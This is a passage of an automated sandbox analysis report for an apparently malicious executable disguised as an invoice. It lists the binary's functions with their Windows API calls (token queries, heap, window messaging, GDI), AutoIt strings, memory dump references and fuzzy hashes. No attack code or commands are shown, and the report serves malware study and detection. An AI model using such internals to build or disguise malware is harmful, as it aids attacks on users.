                                                                • Part of subcall function 0022AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0022AA92
                                                                • Part of subcall function 0022AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0022AA99
                                                                • Part of subcall function 0022AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0022AAAF
                                                              • GetLengthSid.ADVAPI32(?,00000000,0022ADE4,?,?), ref: 0022B21B
                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0022B227
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0022B22E
                                                              • CopySid.ADVAPI32(?,00000000,?), ref: 0022B247
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                              • String ID:
                                                              • API String ID: 4217664535-0
                                                              • Opcode ID: 8c4137bec86b699111a3c53a5f08281d9b07822c2a9f39982b56a95ede4fe993
                                                              • Instruction ID: a1024a1dcd44104e03d43eb79077c13b006a9fa92735c40a82d4575149fbf192
                                                              • Opcode Fuzzy Hash: 8c4137bec86b699111a3c53a5f08281d9b07822c2a9f39982b56a95ede4fe993
                                                              • Instruction Fuzzy Hash: F011C171A10215FFCB099F98ED94AAEB7B9EF84304F14802DE94697210D731AE94CB10
                                                              Function 0022B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0022B498
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0022B4AA
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0022B4C0
                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0022B4DB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 515c0fd73a72eab4a1c73be1bdebdd537f4341d266c76c01226b146437b8e725
                                                              • Instruction ID: bc9f097d02ab34a2551c049265ca2f159ff16bd9f5bf6272636c75ffb343ccc2
                                                              • Opcode Fuzzy Hash: 515c0fd73a72eab4a1c73be1bdebdd537f4341d266c76c01226b146437b8e725
                                                              • Instruction Fuzzy Hash: 6D11187A900228FFDB11EFA9D985E9DBBB8FB08710F204091E604B7295D771AE11DB94
                                                              Function 0020B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0020B5A5
                                                              • GetClientRect.USER32(?,?), ref: 0026E69A
                                                              • GetCursorPos.USER32(?), ref: 0026E6A4
                                                              • ScreenToClient.USER32(?,?), ref: 0026E6AF
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                              • String ID:
                                                              • API String ID: 4127811313-0
                                                              • Opcode ID: ba6d3b8a16f71ebd5e49f09214fe408eff3ef2f182647f2e16791c4c667e03c1
                                                              • Instruction ID: b4e4b58fb4de6717fd806e4de7c411874996a9bce3e346203990e8400e62e546
                                                              • Opcode Fuzzy Hash: ba6d3b8a16f71ebd5e49f09214fe408eff3ef2f182647f2e16791c4c667e03c1
                                                              • Instruction Fuzzy Hash: 84113A3592012ABBCB21DF54DC498EE7BBCEF09305F500491E916E7181D330AAA5CBA5
                                                              Function 0023732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00237352
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00237385
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0023739B
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002373A2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 2880819207-0
                                                              • Opcode ID: 53cce8dc08c3c0879c3c7492e5d18e3bc4039eb0adeaef37ca8388fc03cf971d
                                                              • Instruction ID: 1d8cfb83369b30c77a4d7c0aeb5f4c4612d471e25d9f846259b8d00fef8b6319
                                                              • Opcode Fuzzy Hash: 53cce8dc08c3c0879c3c7492e5d18e3bc4039eb0adeaef37ca8388fc03cf971d
                                                              • Instruction Fuzzy Hash: 861104B2A14205BFDB11DFA8EC09A9E7BADAF45320F044355FC29E32A1D7708D109BA0
                                                              Function 0020D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0020D1BA
                                                              • GetStockObject.GDI32(00000011), ref: 0020D1CE
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 0020D1D8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CreateMessageObjectSendStockWindow
                                                              • String ID:
                                                              • API String ID: 3970641297-0
                                                              • Opcode ID: 5b03246720dd700facd5a6da95f7da11fcc54d758aea46ada74b6947b68aa9d7
                                                              • Instruction ID: e898e9179fbd2101eb8b2bfa69db15ab0f9d2316f9336312153059bd43d8f4fa
                                                              • Opcode Fuzzy Hash: 5b03246720dd700facd5a6da95f7da11fcc54d758aea46ada74b6947b68aa9d7
                                                              • Instruction Fuzzy Hash: 3011AD7211260ABFEF024FA0AC54EEABB6DFF08364F040101FA1852090CB719CA0EBA0
                                                              Function 00224DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                              • String ID:
                                                              • API String ID: 3016257755-0
                                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                              • Instruction ID: 54606ef09f665170c3c508f1224bdcb0c8dc6692d44dcb12e3156b4a19cf63c8
                                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                              • Instruction Fuzzy Hash: 4F014B3206016ABBDF126EC4EC01CEE3F22BB18350B5A8455FE2859035D376CAB1AF81
                                                              Function 00217452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00217A0D: __getptd_noexit.LIBCMT ref: 00217A0E
                                                              • __lock.LIBCMT ref: 0021748F
                                                              • InterlockedDecrement.KERNEL32(?), ref: 002174AC
                                                              • _free.LIBCMT ref: 002174BF
                                                              • InterlockedIncrement.KERNEL32(00C023B8), ref: 002174D7
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                              • String ID:
                                                              • API String ID: 2704283638-0
                                                              • Opcode ID: 7cc704681855d239bdf9c07423eb7a473fd5dd754e845caf9c4a001e538eccb1
                                                              • Instruction ID: edde76e0859c8d2b6e9849bc4d1242fbcd40728813fdce4ff749366cfc811903
                                                              • Opcode Fuzzy Hash: 7cc704681855d239bdf9c07423eb7a473fd5dd754e845caf9c4a001e538eccb1
                                                              • Instruction Fuzzy Hash: 5201D631929616A7DB12AFA4A40D7DDBBF0BFA5710F244045F81467680CB3459F0CFD2
                                                              Function 0025EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0020AFE3
                                                                • Part of subcall function 0020AF83: SelectObject.GDI32(?,00000000), ref: 0020AFF2
                                                                • Part of subcall function 0020AF83: BeginPath.GDI32(?), ref: 0020B009
                                                                • Part of subcall function 0020AF83: SelectObject.GDI32(?,00000000), ref: 0020B033
                                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0025EA8E
                                                              • LineTo.GDI32(00000000,?,?), ref: 0025EA9B
                                                              • EndPath.GDI32(00000000), ref: 0025EAAB
                                                              • StrokePath.GDI32(00000000), ref: 0025EAB9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                              • String ID:
                                                              • API String ID: 1539411459-0
                                                              • Opcode ID: 84190e45d2f2b39d89cece78272412be75552f45ac8a785ceaa4059f0968923c
                                                              • Instruction ID: fd55c53340dbc71ff0f82e94658ab635271d617e43d8f67a5a6b40f5064b2a3f
                                                              • Opcode Fuzzy Hash: 84190e45d2f2b39d89cece78272412be75552f45ac8a785ceaa4059f0968923c
                                                              • Instruction Fuzzy Hash: 3AF08232005259BBDB12AFA4BC0DFCE3F29AF06311F544201FE15650E1877596A5CB99
                                                              Function 0022C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0022C84A
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0022C85D
                                                              • GetCurrentThreadId.KERNEL32 ref: 0022C864
                                                              • AttachThreadInput.USER32(00000000), ref: 0022C86B
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                              • String ID:
                                                              • API String ID: 2710830443-0
                                                              • Opcode ID: 591d70540f4720bf1ce8adc8acd00a72ff55e3d6a121ccab57f49ec1a866b694
                                                              • Instruction ID: 96ad2b5d38d4aa1353da884b85b0c1d3e11daabaf3dad2e827c762b2265fb8e5
                                                              • Opcode Fuzzy Hash: 591d70540f4720bf1ce8adc8acd00a72ff55e3d6a121ccab57f49ec1a866b694
                                                              • Instruction Fuzzy Hash: ABE03971141228BADB211FA2BC0DEDB7F2CEF067A1F408021B60D84460C6B18590CBE0
                                                              Function 0022B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentThread.KERNEL32 ref: 0022B0D6
                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,0022AC9D), ref: 0022B0DD
                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0022AC9D), ref: 0022B0EA
                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,0022AC9D), ref: 0022B0F1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken
                                                              • String ID:
                                                              • API String ID: 3974789173-0
                                                              • Opcode ID: bf7efeecca557c6d002a6c12fd3e3844ccd1ccb0e888ad30b51e86deeebfa5d1
                                                              • Instruction ID: eb2abd3c3a7b902f7750051d655ff5c1cf5cc32453c8982fa15080e21d1a364d
                                                              • Opcode Fuzzy Hash: bf7efeecca557c6d002a6c12fd3e3844ccd1ccb0e888ad30b51e86deeebfa5d1
                                                              • Instruction Fuzzy Hash: 26E08632601222ABD7211FB17C0CB473BB8EF55791F018818F249D6040DF349481CB60
                                                              Function 0020B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSysColor.USER32(00000008), ref: 0020B496
                                                              • SetTextColor.GDI32(?,000000FF), ref: 0020B4A0
                                                              • SetBkMode.GDI32(?,00000001), ref: 0020B4B5
                                                              • GetStockObject.GDI32(00000005), ref: 0020B4BD
                                                              • GetWindowDC.USER32(?,00000000), ref: 0026DE2B
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0026DE38
                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0026DE51
                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0026DE6A
                                                              • GetPixel.GDI32(00000000,?,?), ref: 0026DE8A
                                                              • ReleaseDC.USER32(?,00000000), ref: 0026DE95
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                              • String ID:
                                                              • API String ID: 1946975507-0
                                                              • Opcode ID: ba26dd99303019ba1f8eee64bc1e3e4ef9a248242bd4599e13a9b00ef2afd5ba
                                                              • Instruction ID: 6e75529d9ca3d915729e80ef551e484889db65b2a79124cd09fccb36ded75b35
                                                              • Opcode Fuzzy Hash: ba26dd99303019ba1f8eee64bc1e3e4ef9a248242bd4599e13a9b00ef2afd5ba
                                                              • Instruction Fuzzy Hash: C2E06D31610245ABDB212F74BC0DBD93B21AF51335F44C266FA7D580E2C37249D0CB11
                                                              Function 0026B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: c4bbd1207701af70b986976923120218d6e9b3ae46fea7de815ab8f3be2e5c05
                                                              • Instruction ID: b6638788352baec1982a7549210731289f7d2444683ef257821739011e6a5b70
                                                              • Opcode Fuzzy Hash: c4bbd1207701af70b986976923120218d6e9b3ae46fea7de815ab8f3be2e5c05
                                                              • Instruction Fuzzy Hash: 55E01AB1510204EFDB015F70A84CA2E7BB8EF4C351F118806FC5E87251CBB598808B40
                                                              Function 0022B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0022B2DF
                                                              • UnloadUserProfile.USERENV(?,?), ref: 0022B2EB
                                                              • CloseHandle.KERNEL32(?), ref: 0022B2F4
                                                              • CloseHandle.KERNEL32(?), ref: 0022B2FC
                                                                • Part of subcall function 0022AB24: GetProcessHeap.KERNEL32(00000000,?,0022A848), ref: 0022AB2B
                                                                • Part of subcall function 0022AB24: HeapFree.KERNEL32(00000000), ref: 0022AB32
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                              • String ID:
                                                              • API String ID: 146765662-0
                                                              • Opcode ID: dca5cfd1c6500f5e8fbf5f53406cb7d91932c431a802446fd96b3c89e0ebc8b8
                                                              • Instruction ID: eee8f1f75c444e034e6d7c853c8ccb1a845d56c0076be30c99124e14cba43ded
                                                              • Opcode Fuzzy Hash: dca5cfd1c6500f5e8fbf5f53406cb7d91932c431a802446fd96b3c89e0ebc8b8
                                                              • Instruction Fuzzy Hash: D9E0263A104405BBDB016BA5FC0C859FBB6FF993213508621F62981575CB72A8B1EF91
                                                              Function 0026B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                              • String ID:
                                                              • API String ID: 2889604237-0
                                                              • Opcode ID: 12009f0f5ff4fce972cd0d524959ce3a8c96303a8f7c08632b57d5a149cc830b
                                                              • Instruction ID: c38d18f1c4c6de3e98bdb65f7d8b7cabcd893d402be7354306e7abb278a58083
                                                              • Opcode Fuzzy Hash: 12009f0f5ff4fce972cd0d524959ce3a8c96303a8f7c08632b57d5a149cc830b
                                                              • Instruction Fuzzy Hash: 46E0B6B1510304EFDB015F70E84CA6DBBB9EF4C351F12881AF95E9B251DBB9A9818F50
                                                              Function 0022DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 0022DEAA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ContainedObject
                                                              • String ID: AutoIt3GUI$Container
                                                              • API String ID: 3565006973-3941886329
                                                              • Opcode ID: 92db10bdd7cca7327ad2ad9591afec3b410cbb385823826166e7c6e8251792bd
                                                              • Instruction ID: 57a118486b76f754da1b204196465c4cd0ed521e505f7340551019d1a5647e50
                                                              • Opcode Fuzzy Hash: 92db10bdd7cca7327ad2ad9591afec3b410cbb385823826166e7c6e8251792bd
                                                              • Instruction Fuzzy Hash: 9C914870620712EFDB24CFA4D984B6AB7B5BF49710F10846DF94ACB691DBB0E851CB50
                                                              Function 0023290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
